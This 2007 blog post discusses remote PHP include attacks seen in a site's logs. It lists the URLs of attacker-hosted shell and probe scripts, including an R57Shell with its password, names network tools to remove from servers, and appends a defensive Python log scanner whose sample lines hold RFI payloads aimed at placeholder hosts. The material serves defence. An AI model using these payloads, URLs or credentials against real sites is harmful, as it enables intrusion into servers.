Thursday, September 20, 2007

Remote PHP Includes

Some of the most delightful things come via public mailing lists.

This goody brought to you by Dave Arrowsmith via the Whitestar List.


"I implimented [sic] a .htaccess Rule to 301 redirect of libwww-perl etc to google.com

RewriteEngine On
# Any request whose User-Agent starts with "libwww-perl" (case-insensitive) is sent a 301 to Google
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC]
RewriteRule .* http://www.google.com/ [R=301,L]

and so they came..."


Probably not the greatest idea to redirect all of your attack traffic towards an innocent party; pointing the redirect at http://0.0.0.0/ would have worked just as well.
In the end, Dave had a couple of scripts directed at what I can only assume are phpBB installs:

http:// www.kinkware.com /shop /pub /error.txt - R57Shell - password protected - user: mike pass: rico


Dave contacted Kinkware, who had this to say:

Hi,

We will investigate this issue. In the meantime, can you please
provide us your IP address so we can block all traffic to
your address so that you are not affected by this.
Regards,

Tarinder Singh, Systems Administrator
Net Logistics Pty. Ltd.
http://www.netlogistics.com.au


Some others he saw but did not contact:


http:// usuarios.arnet.com.ar / larry123/safe.txt - PHP id script.
http:// 71.102.93.10 /WTS /bin /hak/idpitbull.txt - another PHP id script.
http:// www.compassolutions.com /navegacion/id.txt - another id script.
http:// www.yesevent.org /tmp/echo3 - yet another PHP id script.
http:// coyoteco.iespana.es /cmd.txt - ...one last PHP id script.
http:// www.tukangbecak.com /ban.gif - PHP safe mode check script.
http:// sapikeren.net /yogya-carder/ indonesia/Themes/nebula/temp - another PHP safe mode check script.


So let's recap:

Dave helped protect himself by redirecting libwww-perl user agents elsewhere.
Dave SHOULD redo his .htaccess file so that he stops reflecting his attack traffic onto an innocent third party.
You should follow suit. Furthermore, if they are not required, remove access to: perl, python, ruby, C(++), Java, curl, wget, socat, netcat, cryptcat, ftp, sftp, and telnet. Then drop outbound requests to ports < 1024.
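Blocking the libwww-perl user agent only catches scanners that announce themselves; the probes Dave saw are recognisable on their own, because a remote-include attempt points a PHP include parameter at a URL (classically with a trailing "?"). The following is an added example, not code from the original post: it scans Apache combined-format access log lines for either sign and extracts the remote URL so the hosting party can be contacted, as Dave did. The log lines are constructed samples using reserved example addresses.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A parameter value that is itself a URL is the signature of a remote-include attempt;
# the trailing "?" turns whatever the vulnerable script appends into a harmless query string.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
SCANNER_UA_RE = re.compile(r'^libwww-perl', re.IGNORECASE)

def classify(line):
    """Return a dict describing why a log line looks like an RFI probe, or None if it does not."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group('path')
    reasons, remote = [], []
    if SCANNER_UA_RE.match(m.group('ua')):
        reasons.append('libwww-perl user agent')
    # urlsplit separates the query string; parse_qsl yields (key, value) pairs from it
    for key, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            reasons.append('parameter %s points at a remote URL' % key)
            remote.append(value.rstrip('?'))   # strip the trailing "?" trick for reporting
    if not reasons:
        return None
    return {'ip': m.group('ip'), 'path': path, 'reasons': reasons, 'remote': remote}

def scan(lines):
    """Run classify() over an iterable of log lines and keep only the hits."""
    return [hit for hit in (classify(line) for line in lines) if hit]

# Constructed sample log lines (hypothetical hosts, not the ones listed above).
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Sep/2007:10:01:02 +0000] "GET /shop/index.php?page=http://example.net/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [20/Sep/2007:10:01:09 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [20/Sep/2007:10:02:33 +0000] "GET /forum/viewtopic.php?phpbb_root_path=ftp://example.org/id.txt? HTTP/1.0" 404 0 "-" "Mozilla/4.0"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['ip'], hit['path'], '; '.join(hit['reasons']), hit['remote'])
```

The third sample line shows why the user agent check alone is not enough: the probe uses a browser-like agent, but the parameter value still gives it away.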
